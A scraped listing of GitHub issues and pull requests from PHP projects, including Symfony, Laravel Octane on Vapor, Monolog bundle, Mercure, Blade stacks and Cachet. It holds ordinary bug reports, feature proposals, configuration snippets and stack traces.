Instead of (%s)

View more
1 comment
Hmache

Hmache

11th May 2025 @ 16:43

Description

It currently returns a hardcoded null://. The Dsn class uses parse_url, which doesn't work with just a scheme and no host. I suppose it would be a BC break to fix this, but it is unfortunate. Would you be open to changing it to null://null? This is what most of the examples use, also for the Messenger component.

Example

No response

View more
mwijngaard

mwijngaard

13th Jul 2026 @ 18:17

Currently all options must have a value attribute to be usable with symfony/panther and the ChoiceFormField.

This PR allows instances of WebDriverCheckboxes without a value attribute, e.g.:

<option>ValueAsText</option>
View more
robertfausk

robertfausk

3rd Apr 2025 @ 10:41

> composer -V
Deprecation Notice: Using null as an array offset is deprecated, use an empty string instead in /var/www/application/vendor/symfony/flex/src/Flex.php:184
Composer version 2.10.1 2026-06-04 10:25:59
PHP version 8.5.5 (/usr/bin/php8.5)
View more
JorickPepin

JorickPepin

5th Jun 2026 @ 14:36

Octane Version

2.13.4

Laravel Version

12.47.0

PHP Version

8.4

What server type are you using?

Swoole

Server Version

1.4.2

Database Driver & Version

No response

Description

Summary

We are running a Laravel application on Laravel Vapor (AWS Lambda, runtime: docker). When Octane is enabled (octane: true in [vapor.yml], we intermittently hit a fatal error:

Target class [config] does not exist.

The issue disappears immediately when Octane is disabled (octane: false), which strongly suggests a long-running worker / sandbox container state problem rather than broken application upload code.

Environment

  • Platform: Laravel Vapor (AWS Lambda), runtime: docker
  • PHP: 8.4.15 (Vapor base image / production runtime)
  • laravel/framework: v12.47.0
  • laravel/octane: v2.13.4
  • laravel/vapor-core: v2.43.0
  • symfony/http-foundation: v7.4.3
  • Build steps include: php artisan config:cache, route:cache, view:cache

[vapor.yml]

  • production: octane: false (workaround)

Expected behavior

The service container should always be able to resolve the config binding during request handling.

Actual behavior

When Octane is enabled on Vapor:

  • Some requests fail with Target class [config] does not exist.
  • This happens intermittently and seems correlated with warm containers / long-running lifecycle.
  • Disabling Octane fixes the problem immediately.

Scope / where it happens

This only happens during image upload flows:

  • Post image upload
  • Chat image sending (general image upload endpoints)

Non-upload endpoints appear stable.

Upload flow details (PostService::createImagePost)

The flow roughly does:

  • Read uploaded file from $image->path()
  • Detect dimensions via a helper (ImageService::getImageDimensionsWithFallback)
  • Process image using Intervention Image (GD/Imagick), generate JPEG + thumbnail in a temp path
  • Upload both files to S3 using:
    • Storage::disk('s3')->putFileAs('shared_images/', new File($file), ...)
    • Storage::disk('s3')->putFileAs('shared_images/thumbs/', new File($thumbnailFile), ...)

Frequency / pattern

  • Not deterministic locally.
  • In production/staging it can happen under repeated image uploads (suggesting a warm worker state corruption).
  • Once Octane is disabled, the issue disappears.

What we tried

  • Disabling Sanctum / auth changes: no effect
  • Upgrading to the latest patch versions listed above: already on latest
  • Searching for application code that flushes/unsets container bindings (e.g. forgetInstance('config'), unset($app['config']), $app->flush()): none found
  • Workaround: octane: false in Vapor -> fixes immediately

Request

  • Is this a known issue for Vapor (AWS Lambda) + Octane?
  • Any recommended mitigation/workaround (specific Octane listeners, flush/warm config, etc.)?

Steps To Reproduce

Steps to reproduce

Note: We haven't found a fully deterministic local reproduction. The issue reproduces intermittently on Laravel Vapor (AWS Lambda) with warm containers when Octane is enabled.

  1. Deploy the application to Laravel Vapor (AWS Lambda, runtime: docker) with:

    • octane: true
    • warm: 10 (or any warm setting that keeps containers reused)
    • Build caches enabled (php artisan config:cache, route:cache, view:cache).
  2. Ensure the environment is receiving traffic and containers stay warm.

  3. Trigger image upload requests repeatedly (this is the only place we see the issue):

    • Create a post with an image (uses [PostService::createImagePost], and/or
    • Send an image in chat (any endpoint that uploads an image).

    We reproduce by running a loop that uploads images (same file is ok) for a few minutes. (Optional: run multiple clients in parallel to increase frequency.)

  4. Observe that occasionally one request fails with: Target class [config] does not exist.

  5. As a control / workaround:

    • Set octane: false in vapor.yml and redeploy.
    • Repeat the same upload loop.
    • The error no longer occurs.
View more
👀 1
UtkuDalmaz

UtkuDalmaz

14th Jan 2026 @ 12:06

enhancement pending review

Description

Tables can already persist their sort, search, filters and columns in the user's session, but not their grouping. This adds a persistGroupInSession() method to the table configuration so a user's selected grouping is restored on their next visit, mirroring the existing persistSortInSession():

public function table(Table $table): Table
{
    return $table
        ->groups([
            'status',
            'category',
        ])
        ->persistGroupInSession();
}

While implementing this I found that the updatedTableGroupColumn() Livewire hook was dead code: the underlying property is $tableGrouping, so Livewire resolves the hook as updatedTableGrouping() and the old name never fired. Renaming it fixes that dormant hook (grouping changes now also reset the pagination page correctly) and is what enables writing the grouping to the session.

Visual changes

None. The behavior is opt-in and there is no UI change.

Functional changes

  • Code style has been fixed by running the composer cs command.
  • Changes have been tested to not break existing functionality.
  • Documentation is up-to-date.
View more
IGedeon

IGedeon

12th Jul 2026 @ 16:18

MCP Bundle RFC

hey, we are using this bundle and we would like to configure the underlying DnsRebindingProtectionMiddleware

logic: http entry point here, no middleware are passed, so we do have the default stack https://github.com/symfony/ai/blob/d18da8dda4659231150daa77cccf414b97067123/src/mcp-bundle/src/Controller/McpController.php#L38

with this one https://github.com/modelcontextprotocol/php-sdk/blob/main/src/Server/Transport/Http/Middleware/DnsRebindingProtectionMiddleware.php#L51 having only localhost

I need to configure this $allowedHosts to add my app host. Otherwise we will get http 403 Forbidden: Invalid Host header.

For now I completely decorate/override this controller locally

Question: what would be the proper case to make this configurable over the bundle ? I can work on it if some guidance are provided :)

Thanks

View more
1 comment 👍 2
94noni

94noni

25th Jun 2026 @ 13:46

I apologize in advance for the explanation of this issue, but I believe there is a problem with the way the FrankenPHPHub is activated when using FrankenPHP’s built-in Mercure system.

In Configuration.php we check that FrankenPhpHub class exists as long as the mercure_publish function (docs):

$builtinPublish = class_exists(FrankenPhpHub::class) && \function_exists('mercure_publish');

if ($builtinPublish) {
    $urlNode->defaultNull();
}

But mercure_publish isn't defined when clearing the cache/running PHP CLI:

docker run --rm dunglas/frankenphp php -r "var_dump(function_exists('mercure_publish'));"

Apart from this, which is probably an inconsistency, the main issue is the way FrankenPhpHub class is instantiated in the extension, and its relationship with the presence of the url option in the configuration.

To the problem:

  1. MERCURE_URL is defined in .env (as per recipe) and default value is https://example.com/.well-known/mercure and is pased to hub configuration as %env(default::MERCURE_URL)% , that is fallback to null if variable isn't set
  2. Docker will use the .env file to populate the container environment
  3. In order to use the FrankenPHP built-in Mercure, when need null as hub url, but in compose.yaml you can at most set the variabile to an empty value:
    environment:
      MERCURE_URL: ''
    
  4. MercureExtension.php rely only on $builtinHub = !isset($hub['url']);... but the url is considered to be "present" and the generic Hub instance is created instead of FrankenPhpHub one
  5. Regular Hub class is created, passing null (MERCURE_URL) as url and an exception is thown:

Symfony\Component\Mercure\Hub::__construct(): Argument #1 ($url) must be of type string, null given.

PR reference: https://github.com/symfony/mercure-bundle/pull/106

I’m not sure how environment variable resolution works in the MercureExtension.php, but this step seems incorrect:

foreach ($config['hubs'] as $name => $hub) {
    $builtinHub = !isset($hub['url']);
    // ...
}
View more
2 comments
gremo

gremo

25th May 2026 @ 12:04

Hello,

What do you think about providing an option to encrypt emails when using the Symfony MailerHandler? As described here https://symfony.com/doc/current/mailer.html#encrypting-messages

It's often very useful to be notified by email about errors in an application as described here: https://symfony.com/doc/current/logging/monolog_email.html but in the same time sending emails with technical / sensible information can be seen as security risk and pointed by auditors.

It seems to me it would be possible to add an encrypt_certif option to provide a crt that can be used by the handler to encrypt the emails.

If the encrypt_certif is a valid certificate, it can be passed to the MailerHandler (monolog-bridge) and then used in the send method like this:

protected function send(string $content, array $records)
    {
        //$this->mailer->send($this->buildMessage($content, $records));
        $message = $this->buildMessage($content, $records);

        if ($this->certifEncrypt !== null) {
            $encrypter = new SMimeEncrypter($this->certifEncrypt);
            $this->mailer->send($encrypter->encrypt($message));
        } else {
            $this->mailer->send($message);
        }
    }

What do you think about this idea?

View more
raziel057

raziel057

24th Aug 2022 @ 11:54

TL;DR

Adds shell tab completion (bash/zsh/fish). Dynamic and per-directory — reads the local Scotty file live, no rebuild.

$ scotty run <TAB>          # tasks + macros from ./Scotty.sh
deploy   migrate   rollback   build

$ scotty ssh <TAB>          # remote servers (local excluded)
production   staging

$ scotty <TAB>              # command names
run   ssh   doctor   init   tasks   self-update

Setup is zero-touch: the first interactive run of the phar wires the hook into your shell config automatically (once, guarded). Manual escape hatches:

scotty completion install        # detect shell + add the hook
scotty completion bash|zsh|fish  # print the raw script

Why

scotty run / scotty ssh mean remembering exact task and server names. Every comparable CLI (git, docker, kubectl, composer) has completion for this — Scotty didn't.

How it works

  • Built on Symfony Console's native completion (complete() + the _complete/completion commands).
  • Each TAB runs scotty _complete, which resolves and parses the Scotty file in the current directory — edits reflect instantly, and cd-ing to another project gives that project's tasks (like docker compose reading the local compose file).
  • A shell only surfaces completions once a hook is registered — unavoidable, hence the completion command everyone ships. Since nothing runs at phar install time, the first interactive run registers it: only under a real TTY, never during _complete/completion, exactly once (sentinel file), and the attempt is recorded only on success so a read-only rc file is retried later rather than silently disabling completion.
  • completion install overrides Symfony's built-in completion to add the install action while preserving the raw <shell> dump.

Distribution is unchanged — see the installation docs. No new install step or package manager.

Tests

RunCommand/SshCommand completion (local-server exclusion, options not completed as tasks), CompletionCommand dump/install/idempotency/unsupported-shell, CompletionInstaller install-once/sentinel/empty-HOME. Full suite: 140 passing; pint + phpstan clean.

View more
yondifon

yondifon

18th Jun 2026 @ 15:23

Just a bad copy/paste fix.

View more
sukei

sukei

18th Feb 2026 @ 17:25

allow user to customize their templates by adding a config parameter to list templates folders. generator will search in all folders listed in the configurations before to select its own template. With that, user can modify one or more templates to get what he want without copy all maker classes :).

If no config is made => nothing move, all stay as before, config can be set in a bundle (and the templates can be there too) to maximize reusability.

by example config can be :

maker:
    templates_folders:
        - "makertemplates"
        - "vendor/eltharin/myBundle/makerTemplates
View more
4 comments 👍 1
eltharin

eltharin

12th Jun 2025 @ 10:51

Bug Status: Needs Review TwigComponent
Q A
Bug fix? yes
New feature? no
Deprecations? no
Documentation? no
Issues Fix #3210
License MIT

When a component template restricts its scope with {% with ... only %}, renderTwigComponent() from InteractsWithTwigComponents fails with:

Twig\Error\RuntimeError: Variable "blocks" does not exist

The helper builds a wrapper template that injects the mock block content through a context variable:

{% component "My:Component" with data %}{% block slot1 %}{{ blocks.slot1|raw }}{% endblock %}{% endcomponent %}

But {% with ... only %} resets the context ($context = $vars + [] + globals, see WithNode), so the blocks variable is filtered out before the overridden block is rendered.

This PR inlines the mock content as a Twig string literal instead of passing it through a context variable, so it no longer depends on the rendering context and survives the scope reset. Single-quoted Twig strings don't interpolate {{ ... }} or #{...}, and \ / ' are escaped, so the content is rendered verbatim.

A reproducer was provided by the reporter: https://github.com/janopae/reproduce-symfony-ux-blocks-cant-be-rendered-in-tests

View more
2 comments
Amoifr

Amoifr

28th Jun 2026 @ 03:45

Call to Table::addForeignKeyConstraint now expects only a string for the table argument, so ensure we send table name instead of Table object.

View more
4 comments 👍 2
kissifrot

kissifrot

24th Oct 2024 @ 18:16

dependencies

Bumps postcss from 8.4.24 to 8.4.31.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
dependabot[bot]

dependabot[bot]

7th Oct 2023 @ 22:14

This change addresses environments where internal URL rewriting (e.g., via mod_rewrite) is unavailable, forcing the index.php entry point or script name to remain visible in the request path.

When this 'dirty' absolute path is stored as a target for later redirection, Symfony's logic may prepend the script name again, resulting in duplication (e.g., /index.php/index.php/). Switching to an absolute URL (including scheme and host) prevents this re-processing.

Fixes #1645

View more
1 comment
Dominic-Mayers

Dominic-Mayers

3rd Feb 2026 @ 20:22

Q A
Issues Companion to symfony/ux#3480
License MIT

Companion PR to symfony/ux#3466. Adds the Toolkit/Shadcn docs page for the scroll-area recipe.

Kept as draft until symfony/ux#3466 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:20

Hi,

the https://github.com/fidum/laravel-dashboard-chart-tile package for tiles where is being refered to in the docs isnt compatible with the 4.0 version of laravel Dashboard. Is there already an alternative for?

I made an issue on their repo but without any response.

View more
m-bosch

m-bosch

30th Jun 2026 @ 14:51

When excluding certain HTTP status codes (e.g. 404) from a handler, it would be nice to be able to set up another handler that works as exact complement, namely logging only those HTTP status codes.

View more
1 comment
ThomasLandauer

ThomasLandauer

24th Jun 2021 @ 22:18

consider this configuration (with streamed handler enabled: false, available from monolog-bundle: ^3.11||^4.0)

monolog:
    handlers:
        main:
            type:         fingers_crossed
            action_level: critical
            handler:      grouped
        grouped:
            type:    group
            members: [streamed, deduplicated] # <-- nested here --
        streamed:
            type:    stream
            path:    '%kernel.logs_dir%/%kernel.environment%.log'
            level:   debug
            enabled: false # <-- disabled nested handler --
        deduplicated:
            type:    deduplication
            handler: symfony_mailer
        symfony_mailer:
            type:         symfony_mailer
            from_email:   '[email protected]'
            to_email:     '[email protected]'
            subject:      'An Error Occurred! %%message%%'
            level:        debug
            formatter:    monolog.formatter.html
            content_type: text/html

following exception rises in runtime:

In CheckExceptionOnInvalidReferenceBehaviorPass.php line 119:
                                                                                                                                                                                     
  [Symfony\Component\DependencyInjection\Exception\ServiceNotFoundException]                                                                                                         
  The service "monolog.handler.grouped" has a dependency on a non-existent service "monolog.handler.streamed". Did you mean this: "monolog.handler.deduplicated"?                                                                                                                                                                            
                                                                                                                                                                                     

Exception trace:
  at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:119
 Symfony\Component\DependencyInjection\Compiler\AbstractRecursivePass@anonymous\/var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:104$a8->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:126
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->throwServiceNotFoundException() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:86
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/AbstractRecursivePass.php:90
 Symfony\Component\DependencyInjection\Compiler\AbstractRecursivePass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:51
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/AbstractRecursivePass.php:90
 Symfony\Component\DependencyInjection\Compiler\AbstractRecursivePass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:51
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/AbstractRecursivePass.php:99
 Symfony\Component\DependencyInjection\Compiler\AbstractRecursivePass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:51
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/AbstractRecursivePass.php:90
 Symfony\Component\DependencyInjection\Compiler\AbstractRecursivePass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:51
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->processValue() at /var/www/vendor/symfony/dependency-injection/Compiler/AbstractRecursivePass.php:48
 Symfony\Component\DependencyInjection\Compiler\AbstractRecursivePass->process() at /var/www/vendor/symfony/dependency-injection/Compiler/CheckExceptionOnInvalidReferenceBehaviorPass.php:42
 Symfony\Component\DependencyInjection\Compiler\CheckExceptionOnInvalidReferenceBehaviorPass->process() at /var/www/vendor/symfony/dependency-injection/Compiler/Compiler.php:80
 Symfony\Component\DependencyInjection\Compiler\Compiler->compile() at /var/www/vendor/symfony/dependency-injection/ContainerBuilder.php:768
 Symfony\Component\DependencyInjection\ContainerBuilder->compile() at /var/www/vendor/symfony/http-kernel/Kernel.php:507
 Symfony\Component\HttpKernel\Kernel->initializeContainer() at /var/www/vendor/symfony/http-kernel/Kernel.php:772
 Symfony\Component\HttpKernel\Kernel->preBoot() at /var/www/vendor/symfony/http-kernel/Kernel.php:126
 Symfony\Component\HttpKernel\Kernel->boot() at /var/www/vendor/symfony/framework-bundle/Console/Application.php:190
 Symfony\Bundle\FrameworkBundle\Console\Application->registerCommands() at /var/www/vendor/symfony/framework-bundle/Console/Application.php:72
 Symfony\Bundle\FrameworkBundle\Console\Application->doRun() at /var/www/vendor/symfony/console/Application.php:175
 Symfony\Component\Console\Application->run() at /var/www/bin/console:29
View more
3 comments
kaznovac

kaznovac

28th Nov 2025 @ 09:55

Laravel Data 4.23 TypeScript integration incompatible with TypeScript Transformer v3 (DataCollection types become undefined)

Environment

  • PHP: 8.4
  • Laravel: 12
  • spatie/laravel-data: 4.23.0
  • spatie/laravel-typescript-transformer: 3.3.0
  • spatie/typescript-transformer: 3.2.0

Description

When using Laravel Data's TypeScript integration together with the current TypeScript Transformer v3 stack, DataCollection properties cannot be transformed correctly.

Nested Data objects work as expected, but collections of Data objects either:

  1. Generate as undefined
  2. Generate as invalid TypeScript such as:
post_items: undefined<number, App.Data.PostItem.PostItemLightData>

Additionally, attempting to use Laravel Data's DataTypeScriptTransformer causes a fatal error because it extends a class that no longer exists in spatie/laravel-typescript-transformer v3.

Reproduction

DTO

use App\Data\PostItem\PostItemLightData;
use Spatie\LaravelData\Attributes\DataCollectionOf;
use Spatie\LaravelData\Data;
use Spatie\LaravelData\DataCollection;
use Spatie\TypeScriptTransformer\Attributes\TypeScript;

#[TypeScript]
class FarmerSupplyData extends Data
{
    public function __construct(
        /** @var PostItemLightData[] */
        #[DataCollectionOf(PostItemLightData::class)]
        public DataCollection $post_items,

        public PostItemLightData $item,
    ) {}
}

Child DTO

use Spatie\LaravelData\Data;
use Spatie\TypeScriptTransformer\Attributes\TypeScript;

#[TypeScript]
class PostItemLightData extends Data
{
    public function __construct(
        public int $id,
    ) {}
}

Transformer Provider

use Spatie\LaravelTypeScriptTransformer\TypeScriptTransformerApplicationServiceProvider;
use Spatie\TypeScriptTransformer\Formatters\PrettierFormatter;
use Spatie\TypeScriptTransformer\Transformers\AttributedClassTransformer;
use Spatie\TypeScriptTransformer\Transformers\EnumTransformer;
use Spatie\TypeScriptTransformer\TypeScriptTransformerConfigFactory;
use Spatie\TypeScriptTransformer\Writers\GlobalNamespaceWriter;

class TypeScriptTransformerServiceProvider extends TypeScriptTransformerApplicationServiceProvider
{
    protected function configure(TypeScriptTransformerConfigFactory $config): void
    {
        $config
            ->transformer(AttributedClassTransformer::class)
            ->transformer(EnumTransformer::class)
            ->transformDirectories(app_path())
            ->writer(new GlobalNamespaceWriter('generated.d.ts'))
            ->formatter(PrettierFormatter::class);
    }
}

Actual Result

Generated TypeScript:

item: App.Data.PostItem.PostItemLightData
post_items: undefined

When attempting to provide generic information:

/** @var DataCollection<int, PostItemLightData> */

the generated output becomes:

post_items: undefined<number, App.Data.PostItem.PostItemLightData>

which is invalid TypeScript and causes Prettier to fail.

Expected Result

item: App.Data.PostItem.PostItemLightData
post_items: App.Data.PostItem.PostItemLightData[]

or

post_items: Array<App.Data.PostItem.PostItemLightData>

Additional Findings

Laravel Data ships:

Spatie\LaravelData\Support\TypeScriptTransformer\DataTypeScriptTransformer

which appears to correctly handle Data collections through:

protected function dataCollectionType(...)
{
    return new Array_(
        new Object_(new Fqsen("\\{$class}")),
        $keyType
    );
}

However the class currently extends:

Spatie\LaravelTypeScriptTransformer\Transformers\DtoTransformer
class DataTypeScriptTransformer extends DtoTransformer

but DtoTransformer no longer exists in:

spatie/laravel-typescript-transformer 3.3.0

Attempting to register DataTypeScriptTransformer results in:

Class "Spatie\LaravelTypeScriptTransformer\Transformers\DtoTransformer" not found

This suggests Laravel Data's TypeScript integration is still tied to the older transformer API while the current ecosystem is on TypeScript Transformer v3.

Question

Is Laravel Data 4.23 expected to support:

  • spatie/laravel-typescript-transformer 3.x
  • spatie/typescript-transformer 3.x

for DataCollection TypeScript generation?

If not, is there a recommended workaround until Laravel Data's TypeScript integration is updated for v3?

View more
Jerdon07

Jerdon07

20th Jun 2026 @ 11:29

As asked on Slack

  • Ran bin/console translation:extract --force nl command, this caused the major update in the file. But I guess it should be the recommended way to extract the translations.
    • Running the command also added separate security and validators files. If everybody uses the command above it may be logical to add them and have control over them in the demo application. Otherwise we could explicitly not add them as they seemed to be correctly translated already? For now not added the extra generated files, this could be done later on for every language if we decide to.
  • Added missing label.remember_me (for en and nl)
View more
6 comments
evertharmeling

evertharmeling

4th Dec 2023 @ 10:10

Since symfony/framework-bundle 8.1: Setting the "framework.profiler.collect_serializer_data" configuration option is deprecated. It will be removed in version 9.0.

View more
lxregistry

lxregistry

4th Jun 2026 @ 18:11

Keep open

Several IDEs (including PHPStorm/WebStorm and VS Code) are using the typescript type definitions to enhance their autocompletion for Javascript as well. While investigating #815, I made a small experiment: I generated a index.d.ts file in webpack-encore to have type definitions for the Encore public API (which is defined and documented in index.js). And this solved the type support for PHPStorm 2020.2.

Given that the type declaration can be fully generated from the existing JSDoc, I suggest that we bundle it in the package. For the record, here is the command I ran (at the root of the package): tsc --declaration --allowJs --emitDeclarationOnly index.js.

To make this production-ready, a few changes would be necessary:

  • use a proper semver constraint for the typescript devDependency rather than >=2.9 to be able to use tsc in our publication process (no impact on projects using encore as that constraint is not enforced for enabling typescript features)
  • improve JSDoc types for arrays by specifying the value type (Typescript does not like unspecified Array types).
  • (optionally) improve the JSDoc for callbacks to document their actual signature rather than using {function} (but this will be hard to go fully there: configuration callbacks are dealing with options of loaders, but we cannot refer to the type definitions shipped in these loaders for any optional dependency)
  • (optionally) improve the JSDoc for webpack-encore options to document the available options (for arguments where we mix loader options and Encore options, that's not possible for the same reason than above, but we have many methods with a separate argument for Encore options)
  • add a prepublishOnly script doing that type generation before publishing the releases to npm

All the improve JSDoc steps could actually be done even without shipping typescript type declarations, as they would still proper better type definitions. And actually, I have part of them done locally as part of my experiment.

What do you think @Lyrkan @weaverryan ?

My own vote would be in favor of including them, given that we don't need to maintain the .d.ts file manually.

View more
12 comments 👍 8
stof

stof

3rd Aug 2020 @ 21:27

I have a health check which floods my logs and would like to exclude but it doesn't exclude these paths /ping and /health for 200 status code:

  monolog:
    handlers:
      main:
        type: fingers_crossed
        excluded_http_codes: [ 404, { 200: [ '^/ping', '^/health' ] } ]
View more
👍 2
lampelk

lampelk

28th Apr 2023 @ 11:20

help wanted

Laravel Version

13.11.1

PHP Version

8.4

Database Driver & Version

N/A

Description

Based on the documentation for @stack I would expect to be able to define a @push basically anywhere and have it rendered into the stack. I have come across 2 scenarios where this does not appear to work.

The first is very contrived, and not a realistic way the feature would be used, but could be indicative of the underlying problem.

//welcome.blade.php

@push('scripts')
    before stack
@endpush

@stack('scripts')

@push('scripts')
    after stack
@endpush

In this example, the stack and push are defined in the same view file. Only "before stack" is rendered.

There's really no need to make this scenario work because if you're in the same file you don't need to bother pushing to a stack, but including it to showcase the full failure scenario.


The 2nd example is the specific issue I have run into, and what I hope we can make work. To replicate this issue we need 2 components and 1 view. I've used class based components, but I would assume anonymous one would behave the same.

  • "layout" component
  • "chat" component
  • "welcome" view
//layout.blade.php

<!doctype html>
<html lang="en">
<head>
<title>Title</title>

@stack('scripts')

</head>
<body>

<div>{{ $slot }}</div>

<x-chat input="layout"></x-chat>

</body>
</html>
//welcome.blade.php
<x-layout>

    <x-chat input="view"></x-chat>

    @push('scripts')
        pushed from view
    @endpush

</x-layout>
//chat.blade.php

@push('scripts')
    pushed from chat [{{ $input }}]
@endpush

<div>The Chat</div>

When visiting the "welcome" view, I would expect to see

<!doctype html>
<html lang="en">
<head>
<title>Title</title>
 
pushed from chat [view]
pushed from chat [layout]
pushed from view
 
</head>
<body>
 
<div>The Chat</div>
 
<div>The Chat</div>
 
</body>
</html>

but instead I only get

<!doctype html>
<html lang="en">
<head>
<title>Title</title>
 
pushed from chat [view]
pushed from view
 
</head>
<body>
 
<div>The Chat</div>
 
<div>The Chat</div>
 
</body>
</html>

So the view is able to push to the stack, the component included in the view is able to push to the stack, but the component included in the layout cannot. We can see the component contents are correctly being rendered twice, and it is only the stack push that is not working in the 1 scenario.

As far as I can tell, the compiled views look correct. They are calling startPush(), yieldPushContents(), etc correctly.

I'm going to try and dig into the Blade a little more to try and debug this, but putting this out there because maybe this is a known limitation, or someone has some insight on how to fix this.

Steps To Reproduce

See description.

View more
3 comments 👍 1 👀 1
browner12

browner12

21st May 2026 @ 18:02

bug

Symfony version(s) affected

7.0.7

Description

getting the following error while running WebTestCase tests

symfony php bin/phpunit
PHPUnit 9.6.19 by Sebastian Bergmann and contributors.

Testing
E                                                                   1 / 1 (100%)

Time: 00:00.102, Memory: 20.00 MB

There was 1 error:

1) App\Tests\WebTest::testSomething
LogicException: You cannot create the client used in functional tests if the "framework.test" config is not set to true.

/tmp/test/vendor/symfony/framework-bundle/Test/WebTestCase.php:50
/tmp/test/tests/WebTest.php:11
/tmp/test/vendor/phpunit/phpunit/phpunit:107

How to reproduce

symfony new --webapp test
cd test
symfony console make:test WebTestCase WebTest
symfony php bin/phpunit

Possible Solution

modify phpunit.xml.dist file

<php>
   ...
-    <server name="APP_ENV" value="test" force="true" />
+    <env name="APP_ENV" value="test" force="true" />
+    <env name="KERNEL_CLASS" value="App\Kernel" />
   ...
</php>

Additional Context

No response

View more
IndraGunawan

IndraGunawan

2nd May 2024 @ 17:58

good first issue

It should be possible to report an incident and attach components (with statuses) to incidents in a single API request.

View more
2 comments
jbrooksuk

jbrooksuk

24th Dec 2024 @ 12:16

For the moment, the handler configuration options are all mixed together. This means that it is necessary to validate the options in the extension, even though this is the role of the config tree.

With the introduction of static configuration validation by array shape (and JSON schema?), it would be beneficial for each handler type to have its own configuration. This is already the case for mailer, redis, mongodb, and elasticsearch. We could generalize this with one class per handler, having two methods: one that create the nested config tree and the other that create the handler service definition.

With this approach, we can enable bundles/application to register additional handler types with their own config logic.

This requires a massive deprecation of the existing configuration, we might have some permanent mapping logic to pre-process the configuration.

Inspiration: https://github.com/thephpleague/flysystem-bundle/pull/186

View more
👍 3
GromNaN

GromNaN

12th Nov 2025 @ 17:28

I reported this initially as https://github.com/cachethq/cachet/issues/4573 and was asked to bring it to this project here:


I noticed that in the public list of Scheduled Maintenance, a newly created entry has no link to it's detail view. The detail view exists at /incident/ID but one needs to fiddle out or even guess the ID.

Once such a scheduled maintenance work is done (e.g. the announced time-frame passed), the "x hours ago" text is linked to the incident's detail page.

It would be helpful to have the same link also on planned (future) maintenance work.

View more
mrimann

mrimann

10th Jul 2026 @ 10:10

Status: Needs Review
🎉 7
fabpot

fabpot

26th Mar 2026 @ 08:55

DependencyInjection hasPR
Q A
Feature PR symfony/symfony#64652
PR author(s) @nicolas-grekas
Merged in 8.2

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.2 branch in the symfony-docs repository.

Thank you! :smiley:

View more
fabpot

fabpot

3rd Jul 2026 @ 08:22

Serializer Status: Needs Review

Documents the associative form of csv_headers added in symfony/symfony#64650, which lets you select, rename and reorder the CSV columns when encoding.

The new section covers the behaviors I checked against symfony/serializer:8.2.x-dev:

  • keys are the column labels, values are the paths read from each row;
  • only the listed columns are encoded, in the listed order (no extra column is appended, contrary to the list syntax);
  • rows are flattened first, so nested values are read through csv_key_separator;
  • a path missing from a row produces an empty cell;
  • the associative form only applies to encoding — decode() still expects a list, and only when no_headers is true.

Fix #22453

View more
Amoifr

Amoifr

11th Jul 2026 @ 16:40

Priority: P3 (Medium - Plan to Fix)

Problem

In src/Enums/ScheduleStatusEnum.php:22-34, both incomplete() and upcoming() return [self::upcoming->value, self::in_progress->value].

This is either a copy-paste error or naming confusion. upcoming() logically should return only [self::upcoming->value].

Suggested Fix

Verify the intended semantics and deduplicate or correct the upcoming() method.

View more
jbrooksuk

jbrooksuk

9th Mar 2026 @ 11:43

Q A
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #677
License MIT

Replaces with WebDriverException with PhpWebDriverExceptionInterface in Client->__destruct()

View more
1 comment
martijnhartlief

martijnhartlief

9th Feb 2026 @ 12:17

I deploy a v3 for Cachet and when I try to create a Incident with de Rest API and a component relationed, it doesn't work. The incident is created, but the component is not attached. I'm using the component_id and component_status in the body.

View more
barduek

barduek

23rd Apr 2026 @ 19:27

I a similar fashion as #348, I have added support for Brevo as well.

View more
👍 1
